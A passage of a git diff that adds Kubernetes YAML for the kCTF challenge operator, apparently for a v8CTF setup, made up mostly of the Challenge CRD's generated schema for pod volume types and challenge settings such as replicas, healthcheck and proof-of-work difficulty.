means to use the node''s default medium. Must + be an empty string (default) or Memory. More + info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + type: string + sizeLimit: + anyOf: + - type: integer + - type: string + description: 'Total amount of local storage + required for this EmptyDir volume. The size + limit is also applicable for memory medium. + The maximum usage on memory medium EmptyDir + would be the minimum value between the SizeLimit + specified here and the sum of memory limits + of all containers in a pod. The default is + nil which means that the limit is undefined. + More info: http://kubernetes.io/docs/user-guide/volumes#emptydir' + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + type: object + ephemeral: + description: "Ephemeral represents a volume that + is handled by a cluster storage driver. The volume's + lifecycle is tied to the pod that defines it - + it will be created before the pod starts, and + deleted when the pod is removed. \n Use this if: + a) the volume is only needed while the pod runs, + b) features of normal volumes like restoring from + snapshot or capacity tracking are needed, c) + the storage driver is specified through a storage + class, and d) the storage driver supports dynamic + volume provisioning through a PersistentVolumeClaim + (see EphemeralVolumeSource for more information + on the connection between this volume type and + PersistentVolumeClaim). \n Use PersistentVolumeClaim + or one of the vendor-specific APIs for volumes + that persist for longer than the lifecycle of + an individual pod. \n Use CSI for light-weight + local ephemeral volumes if the CSI driver is meant + to be used that way - see the documentation of + the driver for more information. \n A pod can + use both types of ephemeral volumes and persistent + volumes at the same time. \n This is a beta feature + and only available when the GenericEphemeralVolume + feature gate is enabled." + properties: + volumeClaimTemplate: + description: "Will be used to create a stand-alone + PVC to provision the volume. The pod in which + this EphemeralVolumeSource is embedded will + be the owner of the PVC, i.e. the PVC will + be deleted together with the pod. The name + of the PVC will be `-` + where `` is the name from the + `PodSpec.Volumes` array entry. Pod validation + will reject the pod if the concatenated name + is not valid for a PVC (for example, too long). + \n An existing PVC with that name that is + not owned by the pod will *not* be used for + the pod to avoid using an unrelated volume + by mistake. Starting the pod is then blocked + until the unrelated PVC is removed. If such + a pre-created PVC is meant to be used by the + pod, the PVC has to updated with an owner + reference to the pod once the pod exists. + Normally this should not be necessary, but + it may be useful when manually reconstructing + a broken cluster. \n This field is read-only + and no changes will be made by Kubernetes + to the PVC after it has been created. \n Required, + must not be nil." + properties: + metadata: + description: May contain labels and annotations + that will be copied into the PVC when + creating it. No other fields are allowed + and will be rejected during validation. + type: object + spec: + description: The specification for the PersistentVolumeClaim. + The entire content is copied unchanged + into the PVC that gets created from this + template. The same fields as in a PersistentVolumeClaim + are also valid here. + properties: + accessModes: + description: 'AccessModes contains the + desired access modes the volume should + have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#access-modes-1' + items: + type: string + type: array + dataSource: + description: 'This field can be used + to specify either: * An existing VolumeSnapshot + object (snapshot.storage.k8s.io/VolumeSnapshot) + * An existing PVC (PersistentVolumeClaim) + If the provisioner or an external + controller can support the specified + data source, it will create a new + volume based on the contents of the + specified data source. If the AnyVolumeDataSource + feature gate is enabled, this field + will always have the same contents + as the DataSourceRef field.' + properties: + apiGroup: + description: APIGroup is the group + for the resource being referenced. + If APIGroup is not specified, + the specified Kind must be in + the core API group. For any other + third-party types, APIGroup is + required. + type: string + kind: + description: Kind is the type of + resource being referenced + type: string + name: + description: Name is the name of + resource being referenced + type: string + required: + - kind + - name + type: object + dataSourceRef: + description: 'Specifies the object from + which to populate the volume with + data, if a non-empty volume is desired. + This may be any local object from + a non-empty API group (non core object) + or a PersistentVolumeClaim object. + When this field is specified, volume + binding will only succeed if the type + of the specified object matches some + installed volume populator or dynamic + provisioner. This field will replace + the functionality of the DataSource + field and as such if both fields are + non-empty, they must have the same + value. For backwards compatibility, + both fields (DataSource and DataSourceRef) + will be set to the same value automatically + if one of them is empty and the other + is non-empty. There are two important + differences between DataSource and + DataSourceRef: * While DataSource + only allows two specific types of + objects, DataSourceRef allows any + non-core object, as well as PersistentVolumeClaim + objects. * While DataSource ignores + disallowed values (dropping them), + DataSourceRef preserves all values, + and generates an error if a disallowed + value is specified. (Alpha) Using + this field requires the AnyVolumeDataSource + feature gate to be enabled.' + properties: + apiGroup: + description: APIGroup is the group + for the resource being referenced. + If APIGroup is not specified, + the specified Kind must be in + the core API group. For any other + third-party types, APIGroup is + required. + type: string + kind: + description: Kind is the type of + resource being referenced + type: string + name: + description: Name is the name of + resource being referenced + type: string + required: + - kind + - name + type: object + resources: + description: 'Resources represents the + minimum resources the volume should + have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#resources' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the + maximum amount of compute resources + allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes + the minimum amount of compute + resources required. If Requests + is omitted for a container, it + defaults to Limits if that is + explicitly specified, otherwise + to an implementation-defined value. + More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + selector: + description: A label query over volumes + to consider for binding. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + storageClassName: + description: 'Name of the StorageClass + required by the claim. More info: + https://kubernetes.io/docs/concepts/storage/persistent-volumes#class-1' + type: string + volumeMode: + description: volumeMode defines what + type of volume is required by the + claim. Value of Filesystem is implied + when not included in claim spec. + type: string + volumeName: + description: VolumeName is the binding + reference to the PersistentVolume + backing this claim. + type: string + type: object + required: + - spec + type: object + type: object + fc: + description: FC represents a Fibre Channel resource + that is attached to a kubelet's host machine and + then exposed to the pod. + properties: + fsType: + description: 'Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + lun: + description: 'Optional: FC target lun number' + format: int32 + type: integer + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts.' + type: boolean + targetWWNs: + description: 'Optional: FC target worldwide + names (WWNs)' + items: + type: string + type: array + wwids: + description: 'Optional: FC volume world wide + identifiers (wwids) Either wwids or combination + of targetWWNs and lun must be set, but not + both simultaneously.' + items: + type: string + type: array + type: object + flexVolume: + description: FlexVolume represents a generic volume + resource that is provisioned/attached using an + exec based plugin. + properties: + driver: + description: Driver is the name of the driver + to use for this volume. + type: string + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + The default filesystem depends on FlexVolume + script. + type: string + options: + additionalProperties: + type: string + description: 'Optional: Extra command options + if any.' + type: object + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts.' + type: boolean + secretRef: + description: 'Optional: SecretRef is reference + to the secret object containing sensitive + information to pass to the plugin scripts. + This may be empty if no secret object is specified. + If the secret object contains more than one + secret, all secrets are passed to the plugin + scripts.' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + required: + - driver + type: object + flocker: + description: Flocker represents a Flocker volume + attached to a kubelet's host machine. This depends + on the Flocker control service being running + properties: + datasetName: + description: Name of the dataset stored as metadata + -> name on the dataset for Flocker should + be considered as deprecated + type: string + datasetUUID: + description: UUID of the dataset. This is unique + identifier of a Flocker dataset + type: string + type: object + gcePersistentDisk: + description: 'GCEPersistentDisk represents a GCE + Disk resource that is attached to a kubelet''s + host machine and then exposed to the pod. More + info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + properties: + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + partition: + description: 'The partition in the volume that + you want to mount. If omitted, the default + is to mount by volume name. Examples: For + volume /dev/sda1, you specify the partition + as "1". Similarly, the volume partition for + /dev/sda is "0" (or you can leave the property + empty). More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + format: int32 + type: integer + pdName: + description: 'Unique name of the PD resource + in GCE. Used to identify the disk in GCE. + More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: boolean + required: + - pdName + type: object + gitRepo: + description: 'GitRepo represents a git repository + at a particular revision. DEPRECATED: GitRepo + is deprecated. To provision a container with a + git repo, mount an EmptyDir into an InitContainer + that clones the repo using git, then mount the + EmptyDir into the Pod''s container.' + properties: + directory: + description: Target directory name. Must not + contain or start with '..'. If '.' is supplied, + the volume directory will be the git repository. Otherwise, + if specified, the volume will contain the + git repository in the subdirectory with the + given name. + type: string + repository: + description: Repository URL + type: string + revision: + description: Commit hash for the specified revision. + type: string + required: + - repository + type: object + glusterfs: + description: 'Glusterfs represents a Glusterfs mount + on the host that shares a pod''s lifetime. More + info: https://examples.k8s.io/volumes/glusterfs/README.md' + properties: + endpoints: + description: 'EndpointsName is the endpoint + name that details Glusterfs topology. More + info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + path: + description: 'Path is the Glusterfs volume path. + More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + readOnly: + description: 'ReadOnly here will force the Glusterfs + volume to be mounted with read-only permissions. + Defaults to false. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: boolean + required: + - endpoints + - path + type: object + hostPath: + description: 'HostPath represents a pre-existing + file or directory on the host machine that is + directly exposed to the container. This is generally + used for system agents or other privileged things + that are allowed to see the host machine. Most + containers will NOT need this. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath + --- TODO(jonesdl) We need to restrict who can + use host directory mounts and who can/can not + mount host directories as read/write.' + properties: + path: + description: 'Path of the directory on the host. + If the path is a symlink, it will follow the + link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + type: + description: 'Type for HostPath Volume Defaults + to "" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + required: + - path + type: object + iscsi: + description: 'ISCSI represents an ISCSI Disk resource + that is attached to a kubelet''s host machine + and then exposed to the pod. More info: https://examples.k8s.io/volumes/iscsi/README.md' + properties: + chapAuthDiscovery: + description: whether support iSCSI Discovery + CHAP authentication + type: boolean + chapAuthSession: + description: whether support iSCSI Session CHAP + authentication + type: boolean + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#iscsi + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + initiatorName: + description: Custom iSCSI Initiator Name. If + initiatorName is specified with iscsiInterface + simultaneously, new iSCSI interface : will be created for + the connection. + type: string + iqn: + description: Target iSCSI Qualified Name. + type: string + iscsiInterface: + description: iSCSI Interface Name that uses + an iSCSI transport. Defaults to 'default' + (tcp). + type: string + lun: + description: iSCSI Target Lun number. + format: int32 + type: integer + portals: + description: iSCSI Target Portal List. The portal + is either an IP or ip_addr:port if the port + is other than default (typically TCP ports + 860 and 3260). + items: + type: string + type: array + readOnly: + description: ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + type: boolean + secretRef: + description: CHAP Secret for iSCSI target and + initiator authentication + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + targetPortal: + description: iSCSI Target Portal. The Portal + is either an IP or ip_addr:port if the port + is other than default (typically TCP ports + 860 and 3260). + type: string + required: + - iqn + - lun + - targetPortal + type: object + name: + description: 'Volume''s name. Must be a DNS_LABEL + and unique within the pod. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names' + type: string + nfs: + description: 'NFS represents an NFS mount on the + host that shares a pod''s lifetime More info: + https://kubernetes.io/docs/concepts/storage/volumes#nfs' + properties: + path: + description: 'Path that is exported by the NFS + server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + readOnly: + description: 'ReadOnly here will force the NFS + export to be mounted with read-only permissions. + Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: boolean + server: + description: 'Server is the hostname or IP address + of the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + required: + - path + - server + type: object + persistentVolumeClaim: + description: 'PersistentVolumeClaimVolumeSource + represents a reference to a PersistentVolumeClaim + in the same namespace. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + properties: + claimName: + description: 'ClaimName is the name of a PersistentVolumeClaim + in the same namespace as the pod using this + volume. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + type: string + readOnly: + description: Will force the ReadOnly setting + in VolumeMounts. Default false. + type: boolean + required: + - claimName + type: object + photonPersistentDisk: + description: PhotonPersistentDisk represents a PhotonController + persistent disk attached and mounted on kubelets + host machine + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + pdID: + description: ID that identifies Photon Controller + persistent disk + type: string + required: + - pdID + type: object + portworxVolume: + description: PortworxVolume represents a portworx + volume attached and mounted on kubelets host machine + properties: + fsType: + description: FSType represents the filesystem + type to mount Must be a filesystem type supported + by the host operating system. Ex. "ext4", + "xfs". Implicitly inferred to be "ext4" if + unspecified. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + volumeID: + description: VolumeID uniquely identifies a + Portworx volume + type: string + required: + - volumeID + type: object + projected: + description: Items for all in one resources secrets, + configmaps, and downward API + properties: + defaultMode: + description: Mode bits used to set permissions + on created files by default. Must be an octal + value between 0000 and 0777 or a decimal value + between 0 and 511. YAML accepts both octal + and decimal values, JSON requires decimal + values for mode bits. Directories within the + path are not affected by this setting. This + might be in conflict with other options that + affect the file mode, like fsGroup, and the + result can be other mode bits set. + format: int32 + type: integer + sources: + description: list of volume projections + items: + description: Projection that may be projected + along with other supported volume types + properties: + configMap: + description: information about the configMap + data to project + properties: + items: + description: If unspecified, each + key-value pair in the Data field + of the referenced ConfigMap will + be projected into the volume as + a file whose name is the key and + content is the value. If specified, + the listed keys will be projected + into the specified paths, and unlisted + keys will not be present. If a key + is specified which is not present + in the ConfigMap, the volume setup + will error unless it is marked optional. + Paths must be relative and may not + contain the '..' path or start with + '..'. + items: + description: Maps a string key to + a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode + bits used to set permissions + on this file. Must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path + of the file to map the key + to. May not be an absolute + path. May not contain the + path element '..'. May not + start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its keys must be defined + type: boolean + type: object + downwardAPI: + description: information about the downwardAPI + data to project + properties: + items: + description: Items is a list of DownwardAPIVolume + file + items: + description: DownwardAPIVolumeFile + represents information to create + the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects + a field of the pod: only annotations, + labels, name and namespace + are supported.' + properties: + apiVersion: + description: Version of + the schema the FieldPath + is written in terms of, + defaults to "v1". + type: string + fieldPath: + description: Path of the + field to select in the + specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode + bits used to set permissions + on this file, must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' + format: int32 + type: integer + path: + description: 'Required: Path + is the relative path name + of the file to be created. + Must not be absolute or contain + the ''..'' path. Must be utf-8 + encoded. The first item of + the relative path must not + start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource + of the container: only resources + limits and requests (limits.cpu, + limits.memory, requests.cpu + and requests.memory) are currently + supported.' + properties: + containerName: + description: 'Container + name: required for volumes, + optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the + output format of the exposed + resources, defaults to + "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: + resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + secret: + description: information about the secret + data to project + properties: + items: + description: If unspecified, each + key-value pair in the Data field + of the referenced Secret will be + projected into the volume as a file + whose name is the key and content + is the value. If specified, the + listed keys will be projected into + the specified paths, and unlisted + keys will not be present. If a key + is specified which is not present + in the Secret, the volume setup + will error unless it is marked optional. + Paths must be relative and may not + contain the '..' path or start with + '..'. + items: + description: Maps a string key to + a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode + bits used to set permissions + on this file. Must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path + of the file to map the key + to. May not be an absolute + path. May not contain the + path element '..'. May not + start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + type: object + serviceAccountToken: + description: information about the serviceAccountToken + data to project + properties: + audience: + description: Audience is the intended + audience of the token. A recipient + of a token must identify itself + with an identifier specified in + the audience of the token, and otherwise + should reject the token. The audience + defaults to the identifier of the + apiserver. + type: string + expirationSeconds: + description: ExpirationSeconds is + the requested duration of validity + of the service account token. As + the token approaches expiration, + the kubelet volume plugin will proactively + rotate the service account token. + The kubelet will start trying to + rotate the token if the token is + older than 80 percent of its time + to live or if the token is older + than 24 hours.Defaults to 1 hour + and must be at least 10 minutes. + format: int64 + type: integer + path: + description: Path is the path relative + to the mount point of the file to + project the token into. + type: string + required: + - path + type: object + type: object + type: array + type: object + quobyte: + description: Quobyte represents a Quobyte mount + on the host that shares a pod's lifetime + properties: + group: + description: Group to map volume access to Default + is no group + type: string + readOnly: + description: ReadOnly here will force the Quobyte + volume to be mounted with read-only permissions. + Defaults to false. + type: boolean + registry: + description: Registry represents a single or + multiple Quobyte Registry services specified + as a string as host:port pair (multiple entries + are separated with commas) which acts as the + central registry for volumes + type: string + tenant: + description: Tenant owning the given Quobyte + volume in the Backend Used with dynamically + provisioned Quobyte volumes, value is set + by the plugin + type: string + user: + description: User to map volume access to Defaults + to serivceaccount user + type: string + volume: + description: Volume is a string that references + an already created Quobyte volume by name. + type: string + required: + - registry + - volume + type: object + rbd: + description: 'RBD represents a Rados Block Device + mount on the host that shares a pod''s lifetime. + More info: https://examples.k8s.io/volumes/rbd/README.md' + properties: + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#rbd + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + image: + description: 'The rados image name. More info: + https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + keyring: + description: 'Keyring is the path to key ring + for RBDUser. Default is /etc/ceph/keyring. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + monitors: + description: 'A collection of Ceph monitors. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + items: + type: string + type: array + pool: + description: 'The rados pool name. Default is + rbd. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: boolean + secretRef: + description: 'SecretRef is name of the authentication + secret for RBDUser. If provided overrides + keyring. Default is nil. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + user: + description: 'The rados user name. Default is + admin. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + required: + - image + - monitors + type: object + scaleIO: + description: ScaleIO represents a ScaleIO persistent + volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Default is "xfs". + type: string + gateway: + description: The host address of the ScaleIO + API Gateway. + type: string + protectionDomain: + description: The name of the ScaleIO Protection + Domain for the configured storage. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretRef: + description: SecretRef references to the secret + for ScaleIO user and other sensitive information. + If this is not provided, Login operation will + fail. + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + sslEnabled: + description: Flag to enable/disable SSL communication + with Gateway, default false + type: boolean + storageMode: + description: Indicates whether the storage for + a volume should be ThickProvisioned or ThinProvisioned. + Default is ThinProvisioned. + type: string + storagePool: + description: The ScaleIO Storage Pool associated + with the protection domain. + type: string + system: + description: The name of the storage system + as configured in ScaleIO. + type: string + volumeName: + description: The name of a volume already created + in the ScaleIO system that is associated with + this volume source. + type: string + required: + - gateway + - secretRef + - system + type: object + secret: + description: 'Secret represents a secret that should + populate this volume. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + properties: + defaultMode: + description: 'Optional: mode bits used to set + permissions on created files by default. Must + be an octal value between 0000 and 0777 or + a decimal value between 0 and 511. YAML accepts + both octal and decimal values, JSON requires + decimal values for mode bits. Defaults to + 0644. Directories within the path are not + affected by this setting. This might be in + conflict with other options that affect the + file mode, like fsGroup, and the result can + be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value + pair in the Data field of the referenced Secret + will be projected into the volume as a file + whose name is the key and content is the value. + If specified, the listed keys will be projected + into the specified paths, and unlisted keys + will not be present. If a key is specified + which is not present in the Secret, the volume + setup will error unless it is marked optional. + Paths must be relative and may not contain + the '..' path or start with '..'. + items: + description: Maps a string key to a path within + a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used + to set permissions on this file. Must + be an octal value between 0000 and 0777 + or a decimal value between 0 and 511. + YAML accepts both octal and decimal + values, JSON requires decimal values + for mode bits. If not specified, the + volume defaultMode will be used. This + might be in conflict with other options + that affect the file mode, like fsGroup, + and the result can be other mode bits + set.' + format: int32 + type: integer + path: + description: The relative path of the + file to map the key to. May not be an + absolute path. May not contain the path + element '..'. May not start with the + string '..'. + type: string + required: + - key + - path + type: object + type: array + optional: + description: Specify whether the Secret or its + keys must be defined + type: boolean + secretName: + description: 'Name of the secret in the pod''s + namespace to use. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + type: string + type: object + storageos: + description: StorageOS represents a StorageOS volume + attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretRef: + description: SecretRef specifies the secret + to use for obtaining the StorageOS API credentials. If + not specified, default values will be attempted. + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + volumeName: + description: VolumeName is the human-readable + name of the StorageOS volume. Volume names + are only unique within a namespace. + type: string + volumeNamespace: + description: VolumeNamespace specifies the scope + of the volume within StorageOS. If no namespace + is specified then the Pod's namespace will + be used. This allows the Kubernetes name + scoping to be mirrored within StorageOS for + tighter integration. Set VolumeName to any + name to override the default behaviour. Set + to "default" if you are not using namespaces + within StorageOS. Namespaces that do not pre-exist + within StorageOS will be created. + type: string + type: object + vsphereVolume: + description: VsphereVolume represents a vSphere + volume attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + storagePolicyID: + description: Storage Policy Based Management + (SPBM) profile ID associated with the StoragePolicyName. + type: string + storagePolicyName: + description: Storage Policy Based Management + (SPBM) profile name. + type: string + volumePath: + description: Path that identifies vSphere volume + vmdk + type: string + required: + - volumePath + type: object + required: + - name + type: object + type: array + required: + - containers + type: object + type: object + type: object + powDifficultySeconds: + default: 0 + description: The quantity of seconds of the proof of work + type: integer + replicas: + default: 1 + description: The desired quantity of replicas if horizontal pod autoscaler + is disabled + format: int32 + type: integer + required: + - image + type: object + status: + description: ChallengeStatus defines the observed state of Challenge + properties: + health: + default: disabled + description: Shows healthcheck returns + type: string + status: + default: up-to-date + description: 'Important: Run "operator-sdk generate k8s" to regenerate + code after modifying this file Add custom validation using kubebuilder + tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html + Says if the challenge is up to date or being updated' + type: string + required: + - health + - status + type: object + type: object + served: true + storage: true + subresources: + status: {} +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] diff --git a/v8ctf/kctf/resources/operator.yaml b/v8ctf/kctf/resources/operator.yaml new file mode 100644 index 00000000..7933bbcd --- /dev/null +++ b/v8ctf/kctf/resources/operator.yaml @@ -0,0 +1,4573 @@ +apiVersion: v1 +kind: Namespace +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-system +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: v0.7.0 + creationTimestamp: null + name: challenges.kctf.dev +spec: + group: kctf.dev + names: + kind: Challenge + listKind: ChallengeList + plural: challenges + singular: challenge + scope: Namespaced + versions: + - additionalPrinterColumns: + - jsonPath: .status.health + name: Health + type: string + - jsonPath: .status.status + name: Status + type: string + - jsonPath: .spec.deployed + name: Deployed + type: boolean + - jsonPath: .spec.network.public + name: Public + type: boolean + name: v1 + schema: + openAPIV3Schema: + description: Challenge is the Schema for the challenges API + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: ChallengeSpec defines the desired state of Challenge + properties: + allowConnectTo: + items: + type: string + type: array + deployed: + default: false + description: Shows if the challenge is ready to be deployed, if not, it sets the replicas to 0 and disables services/ingress + type: boolean + healthcheck: + description: Healthcheck checks if the challenge works If empty, healthcheck is not enabled by default + properties: + enabled: + default: false + type: boolean + image: + default: healthcheck + description: Image for the healthcheck container + type: string + type: object + horizontalPodAutoscalerSpec: + description: Autoscaling features determine quantity of replicas and CPU utilization If empty, autoscaling is not enabled by default + properties: + maxReplicas: + 